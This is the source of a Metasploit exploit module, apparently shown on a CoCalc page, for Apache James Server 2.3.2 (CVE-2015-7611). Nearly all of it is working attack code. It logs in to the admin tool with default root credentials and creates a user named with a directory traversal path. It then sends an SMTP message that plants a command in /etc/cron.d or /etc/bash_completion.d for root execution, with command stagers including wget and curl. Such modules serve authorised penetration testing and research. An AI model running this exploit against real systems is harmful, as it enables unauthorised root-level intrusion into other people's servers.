CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/smtp/apache_james_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Exploit::Remote7Rank = NormalRanking89include Msf::Exploit::Remote::Tcp10include Msf::Exploit::CmdStager1112def initialize(info={})13super(update_info(info,14'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",15'Description' => %q{16This module exploits a vulnerability that exists due to a lack of input17validation when creating a user. Messages for a given user are stored18in a directory partially defined by the username. By creating a user19with a directory traversal payload as the username, commands can be20written to a given directory. To use this module with the cron21exploitation method, run the exploit using the given payload, host, and22port. After running the exploit, the payload will be executed within 6023seconds. Due to differences in how cron may run in certain Linux24operating systems such as Ubuntu, it may be preferable to set the25target to Bash Completion as the cron method may not work. If the target26is set to Bash completion, start a listener using the given payload,27host, and port before running the exploit. After running the exploit,28the payload will be executed when a user logs into the system. For this29exploitation method, bash completion must be enabled to gain code30execution. This exploitation method will leave an Apache James mail31object artifact in the /etc/bash_completion.d directory and the32malicious user account.33},34'License' => MSF_LICENSE,35'Author' => [36'Palaczynski Jakub', # Discovery37'Matthew Aberegg', # Metasploit38'Michael Burkey' # Metasploit39],40'References' =>41[42[ 'CVE', '2015-7611' ],43[ 'EDB', '35513' ],44[ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]45],46'Platform' => 'linux',47'Arch' => [ ARCH_X86, ARCH_X64 ],48'Targets' =>49[50[ 'Bash Completion', {51'ExploitPath' => 'bash_completion.d',52'ExploitPrepend' => '',53'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 }54} ],55[ 'Cron', {56'ExploitPath' => 'cron.d',57'ExploitPrepend' => '* * * * * root ',58'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 }59} ]60],61'Privileged' => true,62'DisclosureDate' => '2015-10-01',63'DefaultTarget' => 1,64'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]65))66register_options(67[68OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),69OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),70OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),71OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]),72Opt::RPORT(25)73])74end7576def check77# SMTP service check78connect79smtp_banner = sock.get_once80disconnect81unless smtp_banner.to_s.include? "JAMES SMTP Server"82return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")83end8485# James Remote Administration Tool service check86connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})87admin_banner = sock.get_once88disconnect89unless admin_banner.to_s.include? "JAMES Remote Administration Tool"90return CheckCode::Safe("Target is not JAMES Remote Administration Tool")91end9293# Get version number94version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first95# Null check96unless version97return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")98end99# Create version objects100target_version = Rex::Version.new(version)101vulnerable_version = Rex::Version.new("2.3.2")102103# Check version number104if target_version > vulnerable_version105return CheckCode::Safe106elsif target_version == vulnerable_version107return CheckCode::Appears108elsif target_version < vulnerable_version109return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable")110end111end112113def execute_james_admin_tool_command(cmd)114username = datastore['USERNAME']115password = datastore['PASSWORD']116connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})117sock.get_once118sock.puts(username + "\n")119sock.get_once120sock.puts(password + "\n")121sock.get_once122sock.puts(cmd)123sock.get_once124sock.puts("quit\n")125disconnect126end127128def cleanup129return unless target['ExploitPath'] == "cron.d"130# Delete mail objects containing payload from cron.d131username = "../../../../../../../../etc/cron.d"132password = @account_password133begin134connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']})135sock.get_once136sock.puts("USER #{username}\r\n")137sock.get_once138sock.puts("PASS #{password}\r\n")139sock.get_once140sock.puts("dele 1\r\n")141sock.get_once142sock.puts("quit\r\n")143disconnect144rescue145print_bad("Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password '#{@account_password}'")146end147148# Delete malicious user149delete_user_command = "deluser ../../../../../../../../etc/cron.d\n"150execute_james_admin_tool_command(delete_user_command)151end152153def execute_command(cmd, opts = {})154# Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)155exploit_path = target['ExploitPath']156@account_password = Rex::Text.rand_text_alpha(8..12)157add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}\n"158execute_james_admin_tool_command(add_user_command)159160# Send payload via SMTP161payload_prepend = target['ExploitPrepend']162connect163sock.puts("ehlo [email protected]\r\n")164sock.get_once165sock.puts("mail from: <'@apache.com>\r\n")166sock.get_once167sock.puts("rcpt to: <../../../../../../../../etc/#{exploit_path}>\r\n")168sock.get_once169sock.puts("data\r\n")170sock.get_once171sock.puts("From: [email protected]\r\n")172sock.puts("\r\n")173sock.puts("'\n")174sock.puts("#{payload_prepend}#{cmd}\n")175sock.puts("\r\n.\r\n")176sock.get_once177sock.puts("quit\r\n")178sock.get_once179disconnect180end181182def execute_cmdstager_end(opts)183if target['ExploitPath'] == "cron.d"184print_status("Waiting for cron to execute payload...")185else186print_status("Payload will be triggered when someone logs onto the target")187print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'")188print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")189end190end191192def exploit193execute_cmdstager(background: true)194end195196end197198199